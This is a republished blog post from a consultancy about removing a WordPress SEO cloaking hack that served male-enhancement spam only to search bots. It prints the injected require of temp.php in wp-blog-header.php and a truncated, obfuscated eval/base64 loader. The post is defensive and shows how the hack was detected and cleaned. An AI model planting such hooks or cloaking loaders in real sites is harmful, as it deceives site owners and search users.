WordPress Search Spam

Advertisement

A helpful article for all Word Press Users out there from the National Law Review’s Business of Law weekly guest bloggers – Duo Consulting.  Scott Frazer of Duo goes over a Spam issue that impacted Duo’s Blog and provides a detailed solution on how they fixed the problem!

Advertisement

Our blog was recently affected by a rather clever little hack, and when I went searching for ways to remove it, I couldn’t find much. Here’s a brief writeup of what happened and how I fixed it.

Our Director of Internet Marketing Strategy, Sonny Cohen, spends some of his time searching Google and other search engines for keywords relative to our business. He began noticing that some of those results, while they would return pointers to our blog, were laced with keywords and links to various male enhancement drugs. When I searched our blog for these references, I couldn’t find anything.

Advertisement

Here’s what I was seeing when I would search our blog for the phrase “test”:

Advertisement

But here’s what Google was seeing when it did the same search:

You may notice that the URL in that is to a local file. There are two ways you can see what your site looks like to Google. One is to change the User Agent on your browser to match that of the Googlebot. The other is to use the Webmaster Tool’s “Fetch As Googlebot” lab utility. I used the latter, and saved the resulting report as an HTML file and then opened that file in Chrome.

So why is Google seeing different results than anyone else who visits my site and runs that query? Something different must be happening when Google visits. I started running through the execution path of WordPress. The first file that is accessed is index.php. All this file does is turn on a theming variable and load wp-blog-header.php. So I moved on to that file. It looked like this:

Advertisement

if ( !isset($wp_did_header) ) {
$wp_did_header = true;
require_once( dirname(__FILE__) . ‘/temp.php’ );
require_once( dirname(__FILE__) . ‘/wp-load.php’ );
wp();
require_once( ABSPATH . WPINC . ‘/template-loader.php’ );
}

temp.php? Never heard of it, let’s see what’s inside:

Advertisement

eval (gzinflate(base64_decode(
‘vVhtc9pGEP6emfwHRfUUmGLg9IbkhNrUJrZnEsfFOGmKXc1ZOoMmQqInYYea/Pfu’
.’nnjRG6aZzNRj0Em7++yzu3erOw5/fXM4HU9fvnj5Ym8cRnFnz77q9T/2+sPK2WBw’
…snip for length…
.’6reTZEAXdDrl4QNzE/3F3Wy+iKjPxFe0gH7G+ML1IiecBfHiY+LyWLhsVmDlrQ7g’
.’cvonDPkW65UOKh6zCWuM44kvFr6Ialmvw1/fHP4L’
)));

Now that looks evil. Obfuscated code can’t be good. I decided to see what it does by replacing the “eval” with “print” and then I ran “php test.php” from that directory. The results are very long, but you can see them here.

Advertisement

Basically, the program tries to determine if we are a real person or a search engine bot by looking at things like our IP address and our user agent. If it determines we are human, it goes ahead and returns the standard header. If we’re a bot, it serves the content in “theme.html” which is identical to the second screenshot above.

So to clean things up, I removed the reference to temp.php from wp-blog-header.php, deleted the file temp.php and deleted the file theme.html.

© 1999-2010 Duo Consulting

Advertisement

About the Author – Scott Frazer:

Advertisement

Scott supervises Duo’s network facilities, monitoring hardware and software, analyzing problems and ensuring that the network is fully operational. He works closely with clients to identify, interpret and evaluate their system requirements. He also provides the front-line defense of the Duo network by planning, coordinating and implementing network security measures. An avid Mac user, Scott is nonetheless happy to keep Duo’s servers running on Windows Server 2003 and Ubuntu Linux.

Scott has been working in network administration with Internet companies for over ten years. He has experience designing and maintaining networks and server farms for high-traffic sites in both the hosting and e-commerce arenas. As the senior system administrator for MusicToday, an online ticketing, merchandise and fan club portal, he was responsible for the stability and security of large-volume e-commerce sites, including websites for the Rolling Stones, the Grateful Dead and the Dave Mathews Band. www.duoconsulting.com / 312-529-3006

Published by

National Law Forum

A group of in-house attorneys developed the National Law Review on-line edition to create an easy to use resource to capture legal trends and news as they first start to emerge. We were looking for a better way to organize, vet and easily retrieve all the updates that were being sent to us on a daily basis.In the process, we’ve become one of the highest volume business law websites in the U.S. Today, the National Law Review’s seasoned editors screen and classify breaking news and analysis authored by recognized legal professionals and our own journalists. There is no log in to access the database and new articles are added hourly. The National Law Review revolutionized legal publication in 1888 and this cutting-edge tradition continues today.